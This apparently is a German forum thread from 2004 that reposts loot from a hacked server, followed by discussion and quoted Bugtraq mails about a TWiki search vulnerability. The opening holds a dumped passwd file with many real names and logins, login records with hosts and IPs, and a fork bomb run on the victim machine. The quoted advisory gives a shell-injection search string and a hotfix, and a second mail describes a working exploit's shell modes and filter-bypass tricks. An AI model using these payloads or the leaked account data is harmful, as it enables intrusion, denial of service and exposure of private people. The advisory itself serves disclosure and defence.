franke:x:700:1000r. Carsten Franke:/home/franke:/bin/bash
nanna:x:702:1000:Falconer, Donna:/home/nanna:/bin/bash
flaws:x:703:1000:Florian Laws:/home/flaws:/bin/bash
friedhelm:x:705:1000:Friedhelm Rath:/home/friedhelm:/bin/bash
michael:x:707:1000:Michael Schreiber:/home/michael:/bin/bash
rgoetz:x:708:1000:Roland Götz:/home/rgoetz:/bin/bash
frankm:x:710:1000:Frank Mikley:/home/frankm:/bin/bash
wolles:x:711:1000:Wolfgang Schwammel:/home/wolles:/bin/bash
joachim:x:712:1000:Joachim Feldsieper:/home/joachim:/bin/bash
stefana:x:713:1000:Stefan Adam:/home/stefana:/bin/bash
anton:x:714:1000:Anton Kantschar:/home/anton:/bin/bash
svens:x:715:1000:Steinhilber, Sven:/home/svens:/bin/bash
flachi:x:716:1000ieter Flachmüller:/home/flachi:/bin/bash
iconix:x:717:1000:Peter Klotz:/home/iconix:/bin/bash
wendel:x:718:1000:Wolfgang Wendel:/home/wendel:/bin/bash
tschmid:x:719:1000:Thomas Schmid:/home/tschmid:/bin/bash
ursus:x:721:1000:Klaus Wendel:/home/ursus:/bin/bash
petersc:x:722:1000:Peter Scheuermann:/home/petersc:/bin/bash
dani:x:724:1000aniela Gehle:/home/dani:/bin/bash
chuckgg:x:725:1000:Charles Gebelein:/home/chuckgg:/bin/bash
ho:x:726:1000:Heidemarie Walter:/home/ho:/bin/bash
karinw:x:727:1000:Karin Weber:/home/karinw:/bin/bash
rguent:x:728:1000:Ralf Günther:/home/rguent:/bin/bash
frberger:x:729:1000:Frank Berger:/home/frberger:/bin/bash
michaels:x:730:1000:Michael Stephan:/home/michaels:/bin/bash
rolf:x:731:1000:Rolf Geyer:/home/rolf:/bin/bash
cbraun:x:732:1000:Christian Braun:/home/cbraun:/bin/bash
jh:x:739:1000:Jürgen Häcker:/home/jh:/bin/bash
jtesch:x:740:1000:Joachim Tesch:/home/jtesch:/bin/bash
mstein:x:742:1000:Michael Steinmann:/home/mstein:/bin/bash
secopr:x:745:1000: Liebenzeller Mission GmbH:/home/secopr:/bin/bash
til:x:746:1000:Tilmann Runck:/home/til:/bin/bash
czw:x:747:1000:Frank Numrich:/home/czw:/bin/bash
nicki:x:749:1000:Schwierzock, Norbert:/home/nicki:/bin/bash
frauenwe:x:750:1000:Susanne Meister:/home/frauenwe:/bin/bash
ew10:x:752:1000:Walter Stahlecker:/home/ew10:/bin/bash
kiste:x:753:1000:Klaus Kastens:/home/kiste:/bin/bash
richter:x:754:1000:Helga und Frank Richter:/home/richter:/bin/bash
anette:x:755:1000:Anette Selinger:/home/anette:/bin/bash
cornelius:x:756:1000:Cornelius Chudalla:/home/cornelius:/bin/bash
conny:x:757:1000:Constanze Chudalla:/home/conny:/bin/bash
rinna:x:758:1000:Corinna Chudalla:/home/rinna:/bin/bash
guruz:x:759:1000:Markus Götz:/home/guruz:/bin/bash
karlheinz:x:760:1000:Karl-Heinz Protzer:/home/karlheinz:/bin/bash
test:x:761:1000:Test User:/home/test:/bin/bash
fulbright:x:762:1000:Joachim Selinger:/home/fulbright:/bin/bash
senders:x:763:1000:Christian Braun:/home/senders:/bin/bash
spielws:x:764:1000:Florian Unger:/home/spielws:/bin/bash
almut:x:766:1000:Almut Zwölfer:/home/almut:/bin/bash
ulrich:x:767:1000:Ulrich Frey:/home/ulrich:/bin/bash
uli:x:768:1000:Ulrike Scholz:/home/uli:/bin/bash
andrea:x:769:1000:Andrea Hornschuh:/home/andrea:/bin/bash
hank:x:770:1000:Hans-Jürgen Hinkelmann:/home/hank:/bin/bash
schweizr:x:771:1000:Albert Schweizer:/home/schweizr:/bin/bash
krauss:x:772:1000:Roman Krauß:/home/krauss:/bin/bash
tatjana:x:773:1000:Tatjana Reill-Konietzko:/home/tatjana:/bin/bash
cuddle:x:776:1000:Verwaltungszugang www.cuddleland.org:/home/cuddle:/bin/bash
dorothee:x:777:1000orothee Berger:/home/dorothee:/bin/bash
natascha:x:778:1000:Natascha Berger:/home/natascha:/bin/bash
markush:x:779:1000:Markus Hühn:/home/markush:/bin/bash
guenter:x:780:1000:Günter Wochele:/home/guenter:/bin/bash
heike:x:781:1000:Heike Giegerich:/home/heike:/bin/bash
anita:x:783:1000:Anita Lavarde:/home/anita:/bin/bash
aquabb:x:785:1000: Aquanauten:/home/aquabb:/bin/bash
sookie:x:786:1000:Oliver Suck:/home/sookie:/bin/bash
kombucha:x:788:1000:Günther Frank:/home/kombucha:/bin/bash
wm:x:789:1000:Marion + Wolfgang Gehle:/home/wm:/bin/bash
kino:x:790:1000:Frank Schiele:/home/kino:/bin/bash
lighter:x:791:1000:Michael Kaufmann:/home/lighter:/bin/bash
mwochele:x:792:1000:Markus Wochele:/home/mwochele:/bin/bash
flawed:x:794:1000:Florian Laws:/home/flawed:/bin/bash
juvente:x:795:1000:Olaf Jobmann:/home/juvente:/bin/bash
kotds:x:796:1000:Bauscher, Oliver:/home/kotds:/bin/bash
doro:x:797:1000orothee Gebhardt:/home/doro:/bin/bash
alf:x:798:1000:Alfred Prasch:/home/alf:/bin/bash
dender:x:799:1000avid Ender:/home/dender:/bin/bash
turkali:x:800:1000:Christian Braun:/home/turkali:/bin/bash
kunger:x:801:1000:Karin Unger:/home/kunger:/bin/bash
franzs:x:802:1000:Franz Selinger:/home/franzs:/bin/bash
heby:x:803:1000:Christoph Hebeisen:/home/heby:/bin/bash
jc:x:804:1000:Johannes Catterwell:/home/jc:/bin/bash
igor:x:805:1000:Igor Gilitschenski:/home/igor:/bin/bash
martin:x:806:1000:Martin Rimmele:/home/martin:/bin/bash
crypt:x:807:1000:Philipp Scholl:/home/crypt:/bin/bash
antonjp:x:808:1000:Priebe, Jens:/home/antonjp:/bin/bash
eggs:x:809:1000:Kleines Kueken:/home/eggs:/bin/bash
lohberg:x:810:1000:Philipp Lohberg:/home/lohberg:/bin/bash
matze:x:811:1000:Reiter, Matthias:/home/matze:/bin/bash
sookie2:x:812:1000:Thorsten Suck:/home/sookie2:/bin/bash
hn:x:813:1000:Harry Neufeld:/home/hn:/bin/bash
nick:x:814:1000:Appel, Nick:/home/nick:/bin/bash
hborns:x:815:1000:Hanno Borns:/home/hborns:/bin/bash
faev:x:818:1000: Fulbright Alumni e.V.:/home/faev:/bin/bash
deda:x:819:1000:Andrea Neugebauer:/home/deda:/bin/bash
handball:x:820:1000:Timo Traub:/home/handball:/bin/bash
eva:x:821:1000:Eva Giegerich:/home/eva:/bin/bash
lukas:x:822:1000:Lukas Giegerich:/home/lukas:/bin/bash
phdyn:x:824:1000:Philipp Häuser:/home/phdyn:/bin/bash
cybcon:x:825:1000:Michael Oberdorf:/home/cybcon:/bin/bash
flori:x:826:1000:Florian Hawes:/home/flori:/bin/bash
rdeindl:x:827:1000:Reinhold Deindl:/home/rdeindl:/bin/bash
dirk:x:828:1000irk Ritter:/home/dirk:/bin/bash
whemp:x:830:1000:Wilfried Hemp:/home/whemp:/bin/bash
maxsta:x:831:1000:Max Stahlecker:/home/maxsta:/bin/bash
has:x:833:1000:Harald Schmitz:/home/has:/bin/bash
gunnar:x:834:1000:Carsten Franke:/home/gunnar:/bin/bash
cdeindl:x:835:1000:Christian Deindl:/home/cdeindl:/bin/bash
alina:x:836:1000:Alina Gilitschenski:/home/alina:/bin/bash
stark:x:837:1000:Sabine Stark:/home/stark:/bin/bash
oli:x:838:1000:Oli Kümmel:/home/oli:/bin/bash
knut:x:840:1000:Knut Balchen:/home/knut:/bin/tcsh
lutz:x:841:1000:Lutz Müller:/home/lutz:/bin/bash
zope:x:103:103:Zope Server:/var/zope:/bin/bash
neon:x:842:1000:Stephan Raufer:/home/neon:/bin/bash
hblank:x:843:1000:Hedwig Blank:/home/hblank:/bin/bash
nadine:x:844:1000:Nadine Termöllen:/home/nadine:/bin/bash
idefix:x:845:1000:Joachim Selinger:/home/idefix:/bin/bash
undignified:x:846:1000:Frank Numrich:/home/undignified:/bin/bash
blickpunkt:x:847:1000:Frank Numrich:/home/blickpunkt:/bin/bash
hsn:x:848:1000:Frank Numrich:/home/hsn:/bin/bash
gastara:x:849:1000:Gabi Stahlecker:/home/gastara:/bin/bash
pivi:x:850:1000:Siegfried Blank:/home/pivi:/bin/bash
pselinger:x:851:1000:Peter F. Selinger:/home/pselinger:/bin/bash
mbreidt:x:852:1000:Martin Breidt:/home/mbreidt:/bin/bash
getcrazy:x:853:2000:Oliver Koch:/home/getcrazy:/bin/bash
Luna:x:854:1000:Plein, Oda:/home/Luna:/bin/bash
sgruhn:x:855:1000:Steffen Gruhn:/home/sgruhn:/bin/bash
webalizer:x:201:2001::/home/webalizer:/bin/bash
huse:x:857:1000irk Husemann:/home/huse:/bin/bash
lmftp1:x:858:1000: Liebenzeller Mission GmbH:/home/lmftp1:/bin/bash
eov:x:859:1000:Florian Hawes:/home/eov:/bin/bash
tsvober:x:860:1000:Joachim Schwarz:/home/tsvober:/bin/bash
volker:x:861:1000:Volker Hochwald:/home/volker:/bin/bash
tina_ab:x:862:1000:Tina Hemp:/home/tina_ab:/bin/bash
eggertma:x:863:1000:Marc Eggert:/home/eggertma:/bin/bash
sandrah:x:864:1000:Sandra Hemp:/home/sandrah:/bin/bash
adalipu:x:865:1000:Simon Kowalewski:/home/adalipu:/bin/bash
mdtest:x:866:1000:Michael Deindl:/home/mdtest:/bin/bash
armin:x:867:1000:Armin Meier:/home/armin:/bin/bash
sk8:x:868:1000:Karl Sowada:/home/sk8:/bin/bash
micaela:x:869:1000:Micaela Wippermann:/home/micaela:/bin/bash
xanatus:x:870:1000irk Schaumann:/home/xanatus:/bin/bash
bonnetp:x:871:1000:Paul Page:/home/bonnetp:/bin/bash
romi:x:872:1000:Romi Kaiser:/home/romi:/bin/bash
xyleena:x:873:1000:Carina Ufer:/home/xyleena:/bin/bash
rica:x:874:1000:José Rica:/home/rica:/bin/bash
collino:x:875:1000:Manfred Collino:/home/collino:/bin/bash
lang:x:876:1000:Claudia Lang:/home/lang:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
cbaatz:x:878:1000:Claudia Baßmann:/home/cbaatz:/bin/bash
magoetz:x:880:1000:Maria Götz:/home/magoetz:/bin/bash
equinox:x:881:1000:Florian Kaupp:/home/equinox:/bin/bash
trouble:x:882:1000:Andreas Stöhr:/home/trouble:/bin/bash
bs:x:883:883:BigSister System Monitoring:/home/bs:/bin/bash
smmsp:x:51:51:sendmail daemon:/var/spool/mqueue:/sbin/nologin
jbjunk:x:884:1000:Joachim Baßmann:/home/jbjunk:/bin/bash
sapir:x:885:1000:Verena Hafner:/home/sapir:/bin/bash
sunday:x:886:1000:Marlene C. Sonntag:/home/sunday:/bin/bash
hpn:x:887:1000:Hans Peter Niedermann:/home/hpn:/bin/bash
nuebelw:x:888:1000:Wolfgang Nübel:/home/nuebelw:/bin/bash
x9e8117:x:889:1000:Lutz Varoquier:/home/x9e8117:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
iritas:x:890:1000:Martin Horsch:/home/iritas:/bin/bash
neuland:x:891:1000:Frank Lindemann:/home/neuland:/bin/bash
eli:x:893:1000:Elisa Blank:/home/eli:/bin/bash
cathi:x:894:1000:Catherina Blank:/home/cathi:/bin/bash
silvia:x:895:1000:Silvia Blank:/home/silvia:/bin/bash
mike:x:896:1000:Mike Gehrs:/home/mike:/bin/bash
kablank:x:897:1000:Karsten Blank:/home/kablank:/bin/bash
crashdown:x:898:1000:Martin Fresow:/home/crashdown:/bin/bash
verena:x:899:1000:Verena Maier:/home/verena:/bin/bash
hanno:x:900:1000:Armin Meier:/home/hanno:/bin/bash
gah:x:901:1000:Frank Lindemann:/home/gah:/bin/bash
reuterc:x:902:1000:Christian Reuter:/home/reuterc:/bin/bash
arnold:x:903:1000:Arnold Gräbeldinger:/home/arnold:/bin/bash
freak:x:904:1000:Sebastian Raible:/home/freak:/bin/bash
fsw:x:905:1000:Markus Wochele:/home/fsw:/bin/bash
scape:x:906:1000:Patrick Goldmann:/home/scape:/bin/bash
kk:x:907:1000:Kilian Krause:/home/kk:/bin/bash
clamav:x:202:11:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
stro:x:909:1000:Stephan Rosentreter:/home/stro:/bin/bash
olaf:x:910:1000:Olaf Jobmann:/home/olaf:/bin/bash
rince:x:911:911::/home/rince:/bin/bash
ndim:x:912:1000:Hans Ulrich Niedermann:/home/ndim:/bin/bash
spartenleitung:x:913:1000:Mike Gehrs:/home/spartenleitung:/bin/bash
grzybows:x:914:1000:Andreas Grzybowski:/home/grzybows:/bin/bash
feivel:x:915:1000:Stefan Knies:/home/feivel:/bin/bash
pfeilst:x:917:1000irk Pfeilsticker:/home/pfeilst:/bin/bash
kepler:x:918:1000:Manfred Prof. Dr. Fischer:/home/kepler:/bin/bash
jaha:x:919:1000:Jan Hawes:/home/jaha:/bin/bash
kaha:x:922:1000:Konrad Hawes:/home/kaha:/sbin/nologin
maha:x:923:1000:Marc Hawes:/home/maha:/bin/bash
christian:x:924:1000:Christian Berthold:/home/christian:/bin/bash
hawes:x:925:1000:Florian Hawes:/home/hawes:/bin/bash
iibot:x:926:1000:Tobias Bergmann:/home/iibot:/bin/bash
corinna:x:927:1000:Jürgen Grieb:/home/corinna:/bin/bash
radtke:x:928:1000:Nils Radtke:/home/radtke:/bin/bash
pandre:x:929:1000:Patric Andre:/home/pandre:/bin/bash
mara:x:930:1000:Mara Theilacker:/home/mara:/bin/bash
dasec1:x:931:1000:Joachim Baßmann:/home/dasec1:/bin/bash
dasec2:x:932:1000:Joachim Baßmann:/home/dasec2:/bin/bash

sookie ftpd23486 hg-msq-sof.levig Fri Oct 1 04:04 - 04:04 (00:00)
sookie ftpd23043 hg-msq-sof.levig Fri Oct 1 04:04 - 04:04 (00:00)

wtmp begins Fri Oct 1 04:03:22 2004
sh-2.04$ last | grep -v sookie
kiste pts/9 firewall.netuse. Fri Oct 1 15:19 - 15:26 (00:06)
franke ftpd30639 141.113.101.41 Fri Oct 1 14:54 - 15:07 (00:12)
guruz pts/32 pd9e61732.dip.t- Fri Oct 1 13:52 - 18:45 (04:53)
marti pts/9 iswfwpr02.isw.in Fri Oct 1 13:52 - 14:00 (00:08)
thiessel pts/32 bbnrel7.net.exte Fri Oct 1 13:49 - 13:50 (00:01)
richardp ftpd7952 pD95E8E6E.dip.t- Fri Oct 1 12:25 - 12:44 (00:18)
thiessel pts/36 bbnrel7.net.exte Fri Oct 1 12:13 - 17:14 (05:00)
marti pts/10 iswfwpr02.isw.in Fri Oct 1 10:34 - 10:56 (00:21)
lmftp1 ftpd24467 pD95E9B40.dip.t- Fri Oct 1 10:24 - 10:29 (00:05)
prefect pts/9 pd95e81fc.dip.t- Fri Oct 1 10:12 - 10:58 (00:46)
richardp ftpd22702 pD95E8E6E.dip.t- Fri Oct 1 10:11 - 10:14 (00:02)
flaws pts/14 Fri Oct 1 09:25 - 09:41 (00:16)
marti pts/36 iswfwpr02.isw.in Fri Oct 1 09:22 - 10:00 (00:38)
flaws pts/5 revolution.dmc.d Fri Oct 1 09:14 - 17:32 (08:18)
ps pts/5 217.6.158.38 Fri Oct 1 08:50 - 08:51 (00:00)
lmftp1 ftpd4649 pD95E9B40.dip.t- Fri Oct 1 08:21 - 08:22 (00:00)
ps pts/5 217.6.158.38 Fri Oct 1 08:08 - 08:09 (00:00)
moi ftpd3326 p83.129.176.147. Fri Oct 1 05:11 - 05:11 (00:00)
jtesch pts/9 herzog.cse.unsw. Fri Oct 1 04:34 - 09:32 (04:58)

sh-2.04$ uptime
9:38pm up 179 days, 10:50, 21 users, load average: 2.02, 2.79, 2.73 . GREAT!

sh-2.04$ echo "\$0&\$0">_;chmod +x _;./_
ls
sh: fork: Resource temporarily unavailable
asd
sh: fork: Resource temporarily unavailable
asd
^]
telnet> quit
Connection closed.
(root@meoow):~ $ telnet www.cccs.de 4000
Trying 193.7.177.252...
Connected to www.cccs.de.
Escape character is '^]'.
Connection closed by foreign host.

0ops! Sorry, seems to need a reboot

-EOH

Gopher is now staff :
http://www.cccs.de/wiki/bin/view/Main/BenjaminSchweizer

 

[ouTi]

den lezten abschnitt finde ich ganz schön:

sh-2.04$ uptime
9:38pm up 179 days, 10:50, 21 users, load average: 2.02, 2.79, 2.73 . GREAT!

...

sh-2.04$ echo "\$0&\$0">_;chmod +x _;./_
ls
sh: fork: Resource temporarily unavailable
asd
sh: fork: Resource temporarily unavailable
asd
^]
telnet> quit
Connection closed.
(root@meoow):~ $ telnet www.cccs.de 4000
Trying 193.7.177.252...
Connected to www.cccs.de.
Escape character is '^]'.
Connection closed by foreign host.

0ops! Sorry, seems to need a reboot

-EOH

das arme freebsd 5.2

 

[Daniel Seuffert]

Die Lücke war im twiki, nicht in FreeBSD current zur der Zeit, nur zur Info für etwas weniger versierte Leser des threads. Auf einem anderen $OS wäre ein hack genauso möglich gewesen.

<trollmode>
Und was hat twiki für ne Lizenz? GNU, die Wurzel allen Übels!
</trollmode>

 

[ouTi]

schon klar daniel
freebsd bzw beastie ist zu süss um nur in irgendeiner form dafür verantwortlich sein zu können

aber ich dachte google ist die wurzel allen üebsl...

<analtux> google = google is the root of all evil!!! [von _sensei in #bsdforen.de (12.09.2004 -@- 22:02)]

 

[asg]

@DanielSeuffert
LOL. Ein Herr Balmer könnte es nicht treffender formulieren.

Befreit *BSD vom GNU! Wann wird es endlich eine Kampagne geben Herr Seuffert? Spende Salzstangen und Teufelskraut.

 

[r0b0]

krasse sache das

r0b0

 

[CRAZyBUg]

Wenn man an die mail im Bugtraq denkt...

VULNERABLE SOFTWARE VERSIONS


TWiki http://twiki.org/


- TWiki 20030201 (e.g. Debian Sarge)
- probably later versions


- Subversion repository at
<http://ntwiki.ethermage.net:8181/svn/twiki/trunk>
at least until revision 3224 (including)



ATTACK VECTORS


HTTP GET requests towards the Wiki server (typically port 80/TCP).
Usually, no prior authentication is necessary.


Possibly also HTTP POST, but this is untested.



IMPACT


An attacker is able to execute arbitrary shell commands with the
privileges of the TWiki process.



DETAILS


The TWiki search function uses a user supplied search string to
compose a command line executed by the Perl backtick (``) operator.


The search string is not checked properly for shell metacharacters
and is thus vulnerable to search string containing quotes and shell
commands.


An example search string would be:


doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2


If access to the Wiki is not restricted by other means, attackers can
use the search function without prior authentication.


As indicated in the source code, the software authors were aware that
the way they worked around Perl's taint check is insecure. Users of
TWiki should reconsider if the software can meet their security
requirements, given such gross negligence.



COUNTERMEASURES


- Hotfix (see patch at end of advisory)
The hotfix is known to prevent the current attacks, but it might
not be a complete fix.
- Filter access to the web server.
- Use the web server software to restrict access to the web pages
served by TWiki.
- Rewrite the TWiki code to correctly check user supplied strings.
- Rewrite the TWiki code to use Perl code to open and scan the files
instead of running commands in the shell.



AUTHORS AND CREDITS


Markus Goetz, Joerg Hoh, Michael Holzt, Florian Laws,
Hans Ulrich Niedermann, Andreas Thienemann, Peter Thoeny,
Florian Weimer contributed to this advisory.



HOTFIX


--- twiki/lib/TWiki/Search.pm.orig 2004-11-12 20:16:56.000000000 +0100
+++ twiki/lib/TWiki/Search.pm 2004-11-12 20:36:21.000000000 +0100
-135,6 +135,11
my $tempVal = "";
my $tmpl = "";
my $topicCount = 0; # JohnTalintyre
+
+ # Hotfix for search string shell code insertion vulnerability
+ $theSearchVal =~ s/[^A-Za-z0-9+\-_]//g; # only accept known-good chars
+ $theSearchVal = substr($theSearchVal, 0, 100); # limit string to reasonable length
+
my $originalSearch = $theSearchVal;
my $renameTopic;
my $renameWeb = "";



VULNERABILITY TIMELINE


early October 2004 earliest confirmed attack


2004-11-12 forensics revealed exploit
vendor contact
vendor responded, with less conservative hotfix


2004-11-13 uncoordinated emergency disclosure

-----Ursprüngliche Nachricht-----
Von: Roman Medina-Heigl Hernandez [mailto:roman@rs-labs.com]
Gesendet: Freitag, 19. November 2004 21:12
An: bugtraq@securityfocus.com
Betreff: TWiki exploit (search.pm / CAN-2004-1037)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi Bugtraqers,

I discovered the recently published vulnerability in TWiki (read more about
it on [1]) and coded a simple working exploit some time ago. It is attached
here or you can download it from [2].

The exploit is written in Perl and has been tested on both Linux and Win32.
Run with no arguments to see supported options. It's beta but it works
(against TWiki "BeijingRelease" [3]; I did a quick test against "Cairo-
Release" [4] and it didn't work for it).

In a normal run, it will open what I call a "pseudo-shell". It isn't really
a shell; each command that we enter is sent independently to the victim server
in a GET or POST request (yes, it works on POST, too) and HTTP response will
be parsed so only the result of the command will be showed (well, there are
some cases where it could fail). The second mode of operation is to create a
PHPShell for you; then you can use it to run arbitrary commands (web-server
must support PHP in this last case).

Please note that in pseudo-shell mode, some characters (like ">") are not
allowed because they are filtered by TWiki code. You can bypass this behaviour
by using some tricks or use the PHP-shell mode, where you don't have any
restriction. For instance, in pseudo-shell mode, this won't work:
"echo hi > /tmp/greetz". But you can use something like:
"echo hi | tee /tmp/greetz", which is quite similar and _do_ work. Another
way to bypass char restrictions is to invoke perl (read exploit code; I've
used this trick to run the command that will create the file containing
PHPShell). There are more ways, only be creative.

I was in the process of adding a third method (a Win32/Unix compatible connect
back shell) but I didn't have time to finish it. I'm still very busy so this
feature will have to wait for some time (it is not easy to bypass some short-
comings in ActivePerl).

Btw, exploit has proxy support (with or without auth), basic HTTP auth and
you can run against HTTP or HTTPS servers. Give it a try! :-)

References:
[1] http://www.rs-labs.com/noticias/the_true_story_of_TWiki_vuln.txt
[2] http://www.rs-labs.com/exploitsntools/tweaky.pl
[3] http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Feb2003
[4] http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Sep2004

Regards,
--Roman

- --
PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBQZ5DvuR/in3q1WdCEQIIrQCg4ERhNp4SDwHOAj3k9z9m1n8tYVcAn0D3
o5RLsw/e4c6XgVgGuM99haTa
=ninJ
-----END PGP SIGNATURE-----